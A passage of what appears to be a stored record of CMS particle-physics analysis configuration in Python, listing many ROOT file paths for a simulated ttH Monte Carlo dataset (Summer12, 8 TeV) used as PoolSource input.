'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'\n ])\nsecFiles.extend([])\n",
"step-5": "import FWCore.ParameterSet.Config as cms\n\nmaxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nreadFiles = cms.untracked.vstring()\nsecFiles = cms.untracked.vstring() \nsource = cms.Source (\"PoolSource\",fileNames = readFiles, secondaryFileNames = secFiles)\nreadFiles.extend( [\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root',\n 